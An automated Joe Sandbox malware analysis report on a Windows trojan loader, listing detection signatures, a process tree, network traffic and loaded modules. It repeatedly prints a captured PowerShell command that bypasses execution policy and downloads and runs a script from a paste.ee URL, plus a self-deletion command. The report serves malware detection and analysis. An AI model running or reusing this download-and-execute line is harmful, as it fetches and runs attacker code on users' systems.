Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EwKKdCrEDu.exe

Overview

General Information

Sample name:EwKKdCrEDu.exe
renamed because original name is a hash value
Original sample name:2dc8cdf825e23ff1df1ad11b3a6f1973.exe
Analysis ID:1543863
MD5:2dc8cdf825e23ff1df1ad11b3a6f1973
SHA1:82af57e0e6d7cf944148d3a16d7c8ca94fa982f8
SHA256:5d215747817125559e1a2d934c301ab466cbc956a6839c8a45f8b02b84b184d0
Tags:32exetrojan
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Injects a PE file into a foreign processes
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • EwKKdCrEDu.exe (PID: 6772 cmdline: "C:\Users\user\Desktop\EwKKdCrEDu.exe" MD5: 2DC8CDF825E23FF1DF1AD11B3A6F1973)
    • BitLockerToGo.exe (PID: 3116 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • powershell.exe (PID: 6692 cmdline: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6636 cmdline: cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.1671695054.0000000001E40000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000
00000000.00000002.1671695054.0000000001EF6000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000
00000000.00000002.1671695054.0000000002088000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000
00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000
Process Memory Space: powershell.exe PID: 6692JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi32_6692.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 3116, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , ProcessId: 6692, ProcessName: powershell.exe
      Source: Process startedAuthor: frack113: Data: Command: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 3116, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , ProcessId: 6692, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 3116, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , ProcessId: 6692, ProcessName: powershell.exe
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 3116, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , ProcessId: 6692, ProcessName: powershell.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 3116, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , ProcessId: 6692, ProcessName: powershell.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: EwKKdCrEDu.exeReversingLabs: Detection: 21%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: EwKKdCrEDu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49712 version: TLS 1.2
      Source: EwKKdCrEDu.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1691529805.0000000006BF9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: BitLockerToGo.pdb source: EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1691225462.0000000006B7E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Users\admin\Desktop\projects\loader\Release\Loader.pdb source: EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001DE0000.00000004.00001000.00020000.00000000.sdmp, EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001EF6000.00000004.00001000.00020000.00000000.sdmp, EwKKdCrEDu.exe, 00000000.00000002.1670983008.0000000001D34000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000004.00000002.1691529805.0000000006C51000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: BitLockerToGo.pdbGCTL source: EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006EC481 FindFirstFileExW,2_2_006EC481

      Networking

      barindex
      Source: unknownDNS query: name: paste.ee
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: global trafficHTTP traffic detected: GET /d/7BWJv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: paste.eeConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /d/7BWJv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: paste.eeConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: paste.ee
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 14:16:36 GMTContent-Length: 0Connection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UStKtoUB%2BMn6VxYd6LAGk1XSBFZccNRFH%2F%2F0%2BRkciZyvLTVzmdhTZsKMaAYaMJJXp%2FETulPobVU%2BrdHglxWwYdtXDGFlCmkgTWBrD5VdVLznzv6mByPejcM1iw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d9b8b691fd32ca2-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1108&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2815&recv_bytes=774&delivery_rate=2562831&cwnd=251&unsent_bytes=0&cid=b691612755f26c0e&ts=493&x=0"
      Source: EwKKdCrEDu.exe, program.js.0.drString found in binary or memory: http://json-schema.org/draft-07/schema
      Source: program.js.0.drString found in binary or memory: http://json-schema.org/draft-07/schema#
      Source: EwKKdCrEDu.exe, program.js.0.drString found in binary or memory: http://json-schema.org/schema
      Source: powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000004.00000002.1687092302.00000000046B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000004.00000002.1691529805.0000000006BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coD
      Source: powershell.exe, 00000004.00000002.1687092302.00000000046B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: EwKKdCrEDu.exe, program.js.0.drString found in binary or memory: https://aws.amazon.com
      Source: powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: EwKKdCrEDu.exe, program.js.0.drString found in binary or memory: https://github.com/aws/jsii
      Source: EwKKdCrEDu.exe, program.js.0.drString found in binary or memory: https://github.com/aws/jsii.git
      Source: EwKKdCrEDu.exe, program.js.0.drString found in binary or memory: https://github.com/aws/jsii/issues
      Source: program.js.0.drString found in binary or memory: https://github.com/jprichardson/node-fs-extra/issues/269
      Source: powershell.exe, 00000004.00000002.1687092302.000000000498D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
      Source: powershell.exe, 00000004.00000002.1687092302.00000000048FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
      Source: powershell.exe, 00000004.00000002.1687092302.00000000048FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/7BWJv
      Source: program.js.0.drString found in binary or memory: https://raw.githubusercontent.com/ajv-validator/ajv/master/lib/refs/data.json#
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49712 version: TLS 1.2

      System Summary

      barindex
      Source: 00000000.00000002.1671695054.0000000001E40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
      Source: 00000000.00000002.1671695054.0000000001EF6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
      Source: 00000000.00000002.1671695054.0000000002088000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
      Source: 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006F503D2_2_006F503D
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006E75DF2_2_006E75DF
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006EFE002_2_006EFE00
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006E22CA2_2_006E22CA
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006F02AB2_2_006F02AB
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006E729D2_2_006E729D
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 006E2140 appears 35 times
      Source: EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs EwKKdCrEDu.exe
      Source: EwKKdCrEDu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.1671695054.0000000001E40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
      Source: 00000000.00000002.1671695054.0000000001EF6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
      Source: 00000000.00000002.1671695054.0000000002088000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
      Source: 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
      Source: classification engineClassification label: mal96.troj.evad.winEXE@9/7@1/1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5612:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4868:120:WilError_03
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeFile created: C:\Users\user\AppData\Local\Temp\jsii-runtime.3078484992Jump to behavior
      Source: EwKKdCrEDu.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: EwKKdCrEDu.exeReversingLabs: Detection: 21%
      Source: EwKKdCrEDu.exeString found in binary or memory: depgithub.com/hashicorp/go-azure-helpersv0.66.2h1:+Pzuo7pdKl0hBXXr5ymmhs4Q40tHAo2nAvHq4WgSjx8=
      Source: EwKKdCrEDu.exeString found in binary or memory: github.com/aws/jsii-runtime-go@v1.103.1/internal/kernel/load.go
      Source: EwKKdCrEDu.exeString found in binary or memory: net/addrselect.go
      Source: EwKKdCrEDu.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeFile read: C:\Users\user\Desktop\EwKKdCrEDu.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\EwKKdCrEDu.exe "C:\Users\user\Desktop\EwKKdCrEDu.exe"
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" Jump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
